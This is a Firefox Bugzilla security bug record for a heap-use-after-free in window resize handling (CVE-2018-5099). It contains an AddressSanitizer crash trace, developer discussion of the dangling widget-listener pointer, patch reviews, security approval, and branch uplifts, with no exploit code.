#37 0x7fce46f7ae36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#38 0x7fce46f7e4c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#39 0x7fce4920a5f3 in PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2038:5
#40 0x7fce492201a8 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4122:7
previously allocated by thread T0 here:
#0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7fce4a03aa43 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7fce4a03aa43 in nsAppShellService::JustCreateTopWindow(nsIXULWindow*, nsIURI*, unsigned int, int, int, bool, nsITabParent*, mozIDOMWindowProxy*, nsWebShellWindow**) /home/worker/workspace/build/src/xpfe/appshell/nsAppShellService.cpp:640
#4 0x7fce4a03cc5b in nsAppShellService::CreateTopLevelWindow(nsIXULWindow*, nsIURI*, unsigned int, int, int, nsITabParent*, mozIDOMWindowProxy*, nsIXULWindow**) /home/worker/workspace/build/src/xpfe/appshell/nsAppShellService.cpp:202:8
#5 0x7fce4a07ec8b in nsXULWindow::CreateNewContentWindow(int, nsITabParent*, mozIDOMWindowProxy*, nsIXULWindow**) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:1994:5
#6 0x7fce4a8e6494 in nsAppStartup::CreateChromeWindow2(nsIWebBrowserChrome*, unsigned int, unsigned int, nsITabParent*, mozIDOMWindowProxy*, bool*, nsIWebBrowserChrome**) /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:658:7
#7 0x7fce49f90484 in nsWindowWatcher::CreateChromeWindow(nsACString_internal const&, nsIWebBrowserChrome*, unsigned int, unsigned int, nsITabParent*, mozIDOMWindowProxy*, nsIWebBrowserChrome**) /home/worker/workspace/build/src/embedding/components/windowwatcher/nsWindowWatcher.cpp:507:5
#8 0x7fce49f8df15 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/embedding/components/windowwatcher/nsWindowWatcher.cpp:1015:14
#9 0x7fce49f90097 in OpenWindow2 /home/worker/workspace/build/src/embedding/components/windowwatcher/nsWindowWatcher.cpp:442:10
#10 0x7fce49f90097 in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/embedding/components/windowwatcher/nsWindowWatcher.cpp:414
#11 0x7fce44d58ab8 in nsGlobalWindow::OpenInternal(nsAString_internal const&, nsAString_internal const&, nsAString_internal const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12610:12
#12 0x7fce44d56ebe in OpenJS /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8467:10
#13 0x7fce44d56ebe in nsGlobalWindow::OpenOuter(nsAString_internal const&, nsAString_internal const&, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8429
#14 0x7fce44d5744f in nsGlobalWindow::Open(nsAString_internal const&, nsAString_internal const&, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8438:3
#15 0x7fce46331cf7 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2426:50
#16 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
#17 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#18 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#19 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#20 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#21 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#22 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#23 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#24 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#25 0x7fce46593bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#26 0x7fce46fc430a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#27 0x7fce46fc430a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#28 0x7fce46f8e6ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
#29 0x7fce46f900d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#30 0x7fce46f7ae36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#31 0x7fce46f7e4c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#32 0x7fce4917621c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1047:7
#33 0x7fce49f1b08b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7638:5
#34 0x7fce49f16e94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7442:7
#35 0x7fce49f1e4ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7339:13
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.h:74:35 in IsLocked
Shadow bytes around the buggy address:
0x0c248003dc80: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
0x0c248003dc90: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c248003dca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c248003dcb0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
0x0c248003dcc0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c248003dcd0: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd
0x0c248003dce0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
0x0c248003dcf0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c248003dd00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c248003dd10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x0c248003dd20: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5553==ABORTING
|
||
Updated•7 years ago
|
Group: core-security → dom-core-security
|
||
Comment 2•7 years ago
|
||
Looks like there's a nested event loop due to sync XHR. Docshell has a weak reference to mTreeOwner so maybe that's related. Olli, do you know how this ownership is supposed to work?
Flags: needinfo?(bugs)
Keywords: csectype-uaf,
sec-high
|
||
Comment 3•7 years ago
|
||
Man, another case where MOZ_CAN_RUN_SCRIPT would save us if we had it annotated more...
nsWindow::DispatchResized is buggy, imo. It's doing:
if (mWidgetListener) {
mWidgetListener->WindowResized(this, mBounds.width, mBounds.height);
}
and under WindowResized we can land in code that first runs random script (and nulls out mWidgetListener), then tries to access "this".
We should hold a strong ref on the stack to mWidgetListener in nsWindow::DispatchResized, and consider adding some MOZ_CAN_RUN_SCRIPT around this stuff.
|
||
Comment 4•7 years ago
|
||
ok, bz answered to my needinfo. I'm trying to learn what all MOZ_CAN_RUN_SCRIPT captures.
Flags: needinfo?(bugs)
|
|
||
Comment 5•7 years ago
|
||
So far no luck reproducing. But yes, based on stack traces we should either keep widget listener alive on the caller site, or add kungfuDeathGrip
|
|
||
Comment 6•7 years ago
|
||
mccr8, by any chance, can you reproduce this? Writing a patch, even if simple one, isn't great without being able to reproduce.
Flags: needinfo?(continuation)
|
|
||
Comment 7•7 years ago
|
||
Caller site would play better with MOZ_CAN_RUN_SCRIPT.
|
|
||
Comment 8•7 years ago
|
||
(In reply to Olli Pettay [:smaug] from comment #6) > mccr8, by any chance, can you reproduce this? Writing a patch, even if > simple one, isn't great without being able to reproduce. No, I wasn't able to. I tried reloading 4 tabs at once with the test, or way more than that, but it didn't help.
Flags: needinfo?(continuation)
|
Assignee | |
Comment 9•7 years ago
|
||
I managed to reproduce it for a few times with a debug asan build. Is there a reason nsBaseWidget::mWidgetListener uses a raw pointer? Could we change it to nsCOMPtr?
|
|
||
Comment 10•7 years ago
|
||
Would that help? What if someone sets the mWidgetListener to null while handling the event? (and I don't know why it is null. Would need to audit memory management around it)
|
|
||
Comment 11•7 years ago
|
||
Oh, now I remember, nsIWidgetListener isn't refcounted. Hmm.
|
|
||
Comment 12•7 years ago
|
||
Ah, because the nsIWidgetListener might be an nsView? In that case, what we should probably do is move the nsIWidgetListener implementation off of nsWebShellWindow onto a separate object. That object would take a ref on the stack to the nsWebShellWindow before calling into it from WindowResized.
|
||
Updated•7 years ago
|
Priority: -- → P2
|
|
Assignee | |
Updated•7 years ago
|
Assignee: nobody → sawang
|
|
Assignee | |
Comment 13•6 years ago
|
||
The original patch in bug 743975 defined nsIWidgetListener::WindowRaised and nsIWidgetListener::WindowLowered, but they were renamed to WindowActivated / WindowDeactivated before landing according to bug 743975 comment 69. The implementation of nsWebBrowser was left with incorrect names. MozReview-Commit-ID: 3bmLT0RcZzw
|
|
Assignee | |
Comment 14•6 years ago
|
||
MozReview-Commit-ID: 5QV6lkCCGW5
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8936601 -
Flags: review?(bzbarsky)
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8936606 -
Flags: review?(bzbarsky)
|
|
||
Comment 15•6 years ago
|
||
Comment on attachment 8936601 [details] [diff] [review] v1p1 r=me, but this might be worth landing separately, because I would expect this to actually change behavior, right?
Attachment #8936601 -
Flags: review?(bzbarsky) → review+
|
|
||
Comment 16•6 years ago
|
||
Comment on attachment 8936606 [details] [diff] [review] v1p2 >+ // The implmentation of non-refcounted nsIWidgetListener, which would hold a "implementation" (this comment is in the patch twice). >+ MOZ_CAN_RUN_SCRIPT void WindowActivated(); Have you run this through try? I would expect that the caller needs to be annotated with either MOZ_CAN_RUN_SCRIPT or MOZ_CAN_RUN_SCRIPT_BOUNDARY (and a followup filed to change it to MOZ_CAN_RUN_SCRIPT) to pass static analysis. Same for all the other MOZ_CAN_RUN_SCRIPT bits. r=me with that.
Attachment #8936606 -
Flags: review?(bzbarsky) → review+
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8936601 -
Attachment is obsolete: true
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8936606 -
Attachment is obsolete: true
|
|
Assignee | |
Comment 17•6 years ago
|
||
MozReview-Commit-ID: 5QV6lkCCGW5
|
|
Assignee | |
Comment 18•6 years ago
|
||
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #15) > Comment on attachment 8936601 [details] [diff] [review] > Part 1: Fix the incorrect nsIWidgetListener function names in nsWebBrowser. > r?bz > > r=me, but this might be worth landing separately, because I would expect > this to actually change behavior, right? Moved to bug 1427691 for landing separately. (In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #16) > Comment on attachment 8936606 [details] [diff] [review] > Part 2: Move the implementation of nsIWidgetListener from nsWebBrowser / > nsWebShellWindow to a separate object, and make the object hold strong > reference to nsWebBrowser / nsWebShellWindow on stack before invoking their > MOZ_CAN_RUN_SCRIPT member functions > > >+ MOZ_CAN_RUN_SCRIPT void WindowActivated(); > > Have you run this through try? I would expect that the caller needs to be > annotated with either MOZ_CAN_RUN_SCRIPT or MOZ_CAN_RUN_SCRIPT_BOUNDARY (and > a followup filed to change it to MOZ_CAN_RUN_SCRIPT) to pass static > analysis. Same for all the other MOZ_CAN_RUN_SCRIPT bits. > > r=me with that. I assume I shouldn't push a sec-high patch to try server. I fixed it and run `./mach static-analysis check --checks="-*, mozilla-can-run-script" toolkit xpfe` locally to verify. Hopefully I'm doing it right.
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8939492 -
Attachment is obsolete: true
|
|
Assignee | |
Comment 19•6 years ago
|
||
MozReview-Commit-ID: 5QV6lkCCGW5
|
|
Assignee | |
Comment 20•6 years ago
|
||
Comment on attachment 8939504 [details] [diff] [review] v3 [Security approval request comment] How easily could an exploit be constructed based on the patch? Just like other UAF bugs, the attacker needs to find a way to put the malicious code into proper memory region right after nsWebBrowser / nsWebShellWindow gets free'd. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? I don't think so, but the comment does mention that the new `nsIWidgetListener` implementations would hold strong references to `nsWebBrowser` & `nsWebShellWindow`. Which older supported branches are affected by this flaw? All: 52 esr, 57, 58 beta. If not all supported branches, which bug introduced the flaw? Ever since nsIWidgetListener being introduced. Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? Not yet, but it should be easy. How likely is this patch to cause regressions; how much testing does it need? It's a relatively low risk, but it's always better to have more test cycles when touching widget related code.
Attachment #8939504 -
Flags: sec-approval?
|
||
Comment 21•6 years ago
|
||
sec-approval+ for trunk. We'll want Beta and ESR52 patches made and nominated for after it lands.
status-firefox57:
--- → wontfix
status-firefox58:
--- → affected
status-firefox59:
--- → affected
status-firefox-esr52:
--- → affected
tracking-firefox58:
--- → +
tracking-firefox59:
--- → +
tracking-firefox-esr52:
--- → 58+
|
|
||
Updated•6 years ago
|
Attachment #8939504 -
Flags: sec-approval? → sec-approval+
|
|
Assignee | |
Updated•6 years ago
|
Keywords: checkin-needed
|
|
||
Comment 22•6 years ago
|
||
https://hg.mozilla.org/integration/mozilla-inbound/rev/ff8ff4350191790ffd0b2c23b5636eab2d2e4fea
|
|
||
Updated•6 years ago
|
Keywords: checkin-needed
|
|
||
Comment 23•6 years ago
|
||
Backed out for at least static bustage at toolkit/components/browser/nsWebBrowser.h:97: bad implicit conversion constructor for 'WidgetListenerDelegate': https://hg.mozilla.org/integration/mozilla-inbound/rev/b3c2dd33904fda551d7efc121e00f8a54c704bcc Push with failures: https://treeherder.mozilla.org/#/jobs?repo=mozilla-inbound&revision=ff8ff4350191790ffd0b2c23b5636eab2d2e4fea&filter-resultStatus=testfailed&filter-resultStatus=busted&filter-resultStatus=exception&filter-resultStatus=retry&filter-resultStatus=usercancel&filter-resultStatus=runnable Failure log: https://treeherder.mozilla.org/logviewer.html#?job_id=154968184&repo=mozilla-inbound /builds/worker/workspace/build/src/toolkit/components/browser/nsWebBrowser.h:97:5: error: bad implicit conversion constructor for 'WidgetListenerDelegate' And sorry for setting the wrong bug status before.
Status: RESOLVED → REOPENED
Flags: needinfo?(sawang)
Resolution: FIXED → ---
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8939504 -
Attachment is obsolete: true
|
|
Assignee | |
Comment 24•6 years ago
|
||
MozReview-Commit-ID: 5QV6lkCCGW5
|
|
Assignee | |
Comment 25•6 years ago
|
||
Updated to address the static analysis issue.
Flags: needinfo?(sawang)
Keywords: checkin-needed
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8936601 -
Attachment description: Part 1: Fix the incorrect nsIWidgetListener function names in nsWebBrowser. r?bz → v1p1
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8936606 -
Attachment description: Part 2: Move the implementation of nsIWidgetListener from nsWebBrowser / nsWebShellWindow to a separate object, and make the object hold strong reference to nsWebBrowser / nsWebShellWindow on stack before invoking their MOZ_CAN_RUN_SCRIPT member functions → v1p2
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8939492 -
Attachment description: Move the implementation of nsIWidgetListener from nsWebBrowser / nsWebShellWindow to a separate object, and make the object hold strong reference to nsWebBrowser / nsWebShellWindow on stack before invoking their MOZ_CAN_RUN_SCRIPT member functions. r=bz → v2
|
|
Assignee | |
Updated•6 years ago
|
Attachment #8939504 -
Attachment description: Move the implementation of nsIWidgetListener from nsWebBrowser / nsWebShellWindow to a separate object. r=bz → v3
|
|
||
Comment 26•6 years ago
|
||
https://hg.mozilla.org/integration/mozilla-inbound/rev/9102d234c63da0d7d9e8e59ee703a782c80b9502
Keywords: checkin-needed
|
||
Comment 27•6 years ago
|
||
https://hg.mozilla.org/mozilla-central/rev/9102d234c63d This needs rebased patches for Beta and ESR52. Please attach them and nominate for approval ASAP since we build the RCs next week.
Status: REOPENED → RESOLVED
Closed: 6 years ago → 6 years ago
Flags: needinfo?(sawang)
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
|
|
Assignee | |
Comment 28•6 years ago
|
||
MozReview-Commit-ID: 5QV6lkCCGW5
|
|
Assignee | |
Comment 29•6 years ago
|
||
Comment on attachment 8942035 [details] [diff] [review] patch-for-beta Approval Request Comment [Feature/Bug causing the regression]: Ever since nsIWidgetListener being introduced. [User impact if declined]: Security risk. [Is this code covered by automated tests?]: No. [Has the fix been verified in Nightly?]: Landed on nightly. Verified locally. [Needs manual test from QE? If yes, steps to reproduce]: No. [List of other uplifts needed for the feature/fix]: None. [Is the change risky?]: Should be low risk. [Why is the change risky/not risky?]: The change adds a wrapper on nsIWidgetListener interface. All it does is holding a strong reference before calling nsWebBrowser / nsWebShellWindow. [String changes made/needed]: None.
Attachment #8942035 -
Attachment description: Move the implementation of nsIWidgetListener from nsWebBrowser / nsWebShellWindow to a separate object. r=bz → patch-for-beta
Flags: needinfo?(sawang)
Attachment #8942035 -
Flags: approval-mozilla-beta?
|
|
Assignee | |
Comment 30•6 years ago
|
||
MozReview-Commit-ID: 5QV6lkCCGW5
|
|
Assignee | |
Comment 31•6 years ago
|
||
Comment on attachment 8942042 [details] [diff] [review] patch-for-esr [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: sec-high User impact if declined: Security risk. Fix Landed on Version: 59 Risk to taking this patch (and alternatives if risky): Modifying widget code always comes with a regression risk, but for this patch it should be relatively low. String or UUID changes made by this patch: None. See https://wiki.mozilla.org/Release_Management/ESR_Landing_Process for more info.
Attachment #8942042 -
Attachment description: Move the implementation of nsIWidgetListener from nsWebBrowser / nsWebShellWindow to a separate object. r=bz → patch-for-esr
Attachment #8942042 -
Flags: approval-mozilla-esr52?
|
||
Comment 32•6 years ago
|
||
Comment on attachment 8942035 [details] [diff] [review] patch-for-beta Fix a sec-high. Beta58+.
Attachment #8942035 -
Flags: approval-mozilla-release+
Attachment #8942035 -
Flags: approval-mozilla-beta?
Attachment #8942035 -
Flags: approval-mozilla-beta+
|
|
||
Comment 33•6 years ago
|
||
Comment on attachment 8942042 [details] [diff] [review] patch-for-esr ESR52+.
Attachment #8942042 -
Flags: approval-mozilla-esr52? → approval-mozilla-esr52+
|
||
Comment 35•6 years ago
|
||
no need for checkin-needed for uplifts, sheriffs have specific bug queries to handle those.
Keywords: checkin-needed
|
|
||
Comment 36•6 years ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-esr52/rev/b95d654de120
|
|
||
Comment 37•6 years ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-beta/rev/5a556e5558de (FIREFOX_58b_RELBRANCH) https://hg.mozilla.org/releases/mozilla-release/rev/3caec21cf4f622aa56a37aa6316800cf55bef13b
|
|
||
Updated•6 years ago
|
Whiteboard: [adv-main58+][adv-esr52.6+]
|
|
||
Updated•6 years ago
|
Alias: CVE-2018-5099
|
||
Updated•6 years ago
|
Flags: qe-verify+
Whiteboard: [adv-main58+][adv-esr52.6+] → [adv-main58+][adv-esr52.6+][post-critsmash-triage]
|
|
||
Updated•6 years ago
|
Flags: sec-bounty?
|
||
Comment 38•6 years ago
|
||
Unfortunately I didn't managed to reproduce the issue mentioned in comment 0. I tried reproducing this multiple times by loading the given testcase in multiple tabs and loading them at the same time. I also tried (without success) reproducing this issue using an asan debug build (per comment 9). Nils, can you help us verify if this issue was fixed?
Flags: needinfo?(nils)
|
|
||
Updated•6 years ago
|
Group: dom-core-security → core-security-release
|
|
||
Updated•6 years ago
|
Flags: sec-bounty? → sec-bounty+
|
|
||
Updated•6 years ago
|
Group: core-security-release
|
|
||
Updated•5 years ago
|
Flags: qe-verify+
|
||
Updated•5 years ago
|
Component: DOM → DOM: Core & HTML
You need to log in
before you can comment on or make changes to this bug.
Description
•